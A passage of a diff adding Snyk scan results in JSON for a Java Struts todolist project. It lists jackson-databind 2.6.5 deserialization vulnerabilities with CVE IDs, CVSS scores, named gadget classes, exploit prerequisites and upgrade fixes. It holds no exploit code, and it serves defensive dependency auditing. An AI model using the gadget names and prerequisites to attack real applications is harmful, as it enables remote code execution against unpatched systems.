"packagePopularityRank": 99, + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5", + "severityWithCritical": "high" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-561587", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[,2.6.7.4)", + "[2.7.0,2.9.10.4)" + ] + }, + "exploit": "Unproven", + "fixedIn": [ + "2.6.7.4", + "2.9.10.4" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.9.10.4)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/commit/05d7e0e13f43e12db6a51726df12c8b4d8040676", + "title": "GItHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2666", + "title": "GitHub Issue" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.8, + "modificationTime": "2024-03-11T09:44:29.301384Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:51:14.113524Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:59:03.656527Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 8.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:44:29.301384Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:14.113524Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. It mishandles the interaction between serialization gadgets and typing, related to gadget `org.apache.commons.proxy.provider.remoting.RmiProvider` (aka apache/commons-proxy).\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.4, 2.9.10.4 or higher.\n## References\n- [GItHub Commit](https://github.com/FasterXML/jackson-databind/commit/05d7e0e13f43e12db6a51726df12c8b4d8040676)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2666)\n", + "epssDetails": { + "percentile": "0.81603", + "probability": "0.00786", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-11112" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-58pp-9c76-5625" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2020-03-31T09:29:29.728517Z", + "functions_new": [ + { + "version": [ + "[,2.9.10.4)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2020-03-31T06:16:37Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2020-03-31T06:16:37Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:51:14.113524Z", + "socialTrendAlert": false, + "packagePopularityRank": 99, + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5", + "severityWithCritical": "high" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-564887", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "credit": [ + "Tatu Saloranta" + ], + "semver": { + "vulnerable": [ + "[,2.6.7.4)", + "[2.7.0,2.9.10.4)" + ] + }, + "exploit": "Unproven", + "fixedIn": [ + "2.6.7.4", + "2.9.10.4" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.9.10.4)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2682", + "title": "GitHub Issue" + }, + { + "url": "https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062", + "title": "Medium Post" + } + ], + "cvssDetails": [ + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:49:54.679784Z" + }, + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:50:17.073265Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:58:57.162608Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:49:54.679784Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:50:17.073265Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. It mishandles the interaction between serialization gadgets and typing, related to `org.apache.commons.jelly.impl.Embedded` (aka `commons-jelly`).\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.4, 2.9.10.4 or higher.\n## References\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2682)\n- [Medium Post](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n", + "epssDetails": { + "percentile": "0.92404", + "probability": "0.04399", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-11620" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-h4rc-386g-6m85" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2020-04-08T10:55:38.169333Z", + "functions_new": [ + { + "version": [ + "[,2.9.10.4)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2020-04-08T00:42:23Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2020-04-08T00:42:23Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:50:17.073265Z", + "socialTrendAlert": false, + "packagePopularityRank": 99, + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5", + "severityWithCritical": "high" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-564888", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "credit": [ + "Tatu Saloranta" + ], + "semver": { + "vulnerable": [ + "[,2.6.7.4)", + "[2.7.0,2.9.10.4)" + ] + }, + "exploit": "Unproven", + "fixedIn": [ + "2.6.7.4", + "2.9.10.4" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[2.0.0,2.9.10.4)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2680", + "title": "GitHub Issues" + }, + { + "url": "https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062", + "title": "Medium Post" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:50:17.355553Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:53:54.585105Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:55:38.933985Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:50:17.355553Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:53:54.585105Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. It mishandles the interaction between serialization gadgets and typing, related to `org.springframework.aop.config.MethodLocatingFactoryBean` (aka `spring-aop`).\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.4, 2.9.10.4 or higher.\n## References\n- [GitHub Issues](https://github.com/FasterXML/jackson-databind/issues/2680)\n- [Medium Post](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n", + "epssDetails": { + "percentile": "0.92902", + "probability": "0.05021", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-11619" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-27xj-rqx5-2255" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2020-04-08T10:59:04.995807Z", + "functions_new": [ + { + "version": [ + "[2.0.0,2.9.10.4)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2020-04-08T00:42:25Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2020-04-08T00:42:25Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:54.585105Z", + "socialTrendAlert": false, + "packagePopularityRank": 99, + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5", + "severityWithCritical": "high" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-570625", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "credit": [ + "XuYuanzhen" + ], + "semver": { + "vulnerable": [ + "[,2.6.7.4)", + "[2.7.0,2.9.10.5)" + ] + }, + "exploit": "Unproven", + "fixedIn": [ + "2.6.7.4", + "2.9.10.5" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.10.0)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/commit/840eae2ca81c597a0010b2126f32dce17d384b70", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2704", + "title": "Github Issue" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:50:25.351249Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:53:54.587184Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:58:40.439153Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:50:25.351249Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:53:54.587184Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. It is possible to conduct a Deserialization attack using the `com.sun.org.apache.xalan.internal.lib.sql.JNDIConnectionPool` (`xalan2`) class gadget if polymorphic type handling is enabled and an application using this package allows user input which gets deserialized. \r\n\r\nNote: This vulnerability does not affect release `2.10.0` onward.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.4, 2.9.10.5 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/840eae2ca81c597a0010b2126f32dce17d384b70)\n- [Github Issue](https://github.com/FasterXML/jackson-databind/issues/2704)\n", + "epssDetails": { + "percentile": "0.93100", + "probability": "0.05308", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-14062" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-c265-37vj-cwcc" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2020-05-29T15:36:30.302636Z", + "functions_new": [ + { + "version": [ + "[,2.10.0)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2020-05-01T15:36:06Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2020-05-29T15:36:05Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:54.587184Z", + "socialTrendAlert": false, + "packagePopularityRank": 99, + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5", + "severityWithCritical": "high" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-572300", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "credit": [ + "Al1ex@knownsec" + ], + "semver": { + "vulnerable": [ + "[,2.6.7.4)", + "[2.7.0,2.9.10.5)" + ] + }, + "exploit": "Unproven", + "fixedIn": [ + "2.6.7.4", + "2.9.10.5" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.9.10.5)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/commit/f6d9c664f6d481703138319f6a0f1fdbddb3a259", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2765", + "title": "GitHub Issue" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:51:24.781685Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:53:54.570033Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:58:46.171514Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:24.781685Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 